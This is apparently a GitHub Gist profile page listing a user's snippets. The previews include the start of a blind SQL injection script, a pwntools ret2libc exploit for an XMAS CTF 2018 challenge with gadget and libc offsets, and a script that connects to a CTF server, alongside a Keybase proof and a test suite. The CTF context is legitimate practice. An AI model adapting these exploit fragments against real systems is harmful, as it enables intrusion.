Skip to content

Instantly share code, notes, and snippets.

🎯
Focusing

Pietro Francesco Tirenna madt1m

🎯
Focusing
Block or report user

Report or block madt1m

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@madt1m
madt1m / async_blind_sqli.py
Created Jun 24, 2019
Studying async programming while hacking is the best.
View async_blind_sqli.py
"""
Requires python3.7 or higher.
"""
import sys
import string
import time
import argparse
import asyncio
import aiohttp
@madt1m
madt1m / forbidden_exploit.py
Created Dec 23, 2018
Exploit for Forbidden Documents - XMAS CTF 2018
View forbidden_exploit.py
from pwn import *
import re
puts_plt = 0x401030
puts_got_plt = 0x404018
poprdi = 0x4014f3
ret = 0x401072
puts_off = 0x68f90
sh_off = 0x1619d9
sys_off = 0x3f480
@madt1m
madt1m / document_retriever.py
Created Dec 23, 2018
A python script used to retrieve the binary executable of CTF challenge "Forbidden Documents" - XMAS CTF 2018
View document_retriever.py
from pwn import *
from sys import argv
import re
def get_chunk(name, size, offset):
try:
p = remote("199.247.6.180", 10004)
payload = name
payload += '\n'
payload += 'y'
View keybase.md

Keybase proof

I hereby claim:

  • I am madt1m on github.
  • I am madt1m (https://keybase.io/madt1m) on keybase.
  • I have a public key whose fingerprint is 25E5 9EB5 A949 9C88 0F35 AD69 1B0D 0F28 BBF8 76DA

To claim this, I am signing this object:

@madt1m
madt1m / tests.py
Created May 20, 2018
A little test_suite in Python for a TCP file transfer server.
View tests.py
""" What do I have to test?
## TESTS FOR SERVER
-> test that server is running on IP and PORT
-> test that server responds -ERR when faced with a GET cmd of more than 255.
-> test that server responds -ERR when command is not GET
-> test that server does handle timeouts
-> test that server only accepts normal files, not directories
-> test that server handles client abruptly closing connection
You can’t perform that action at this time.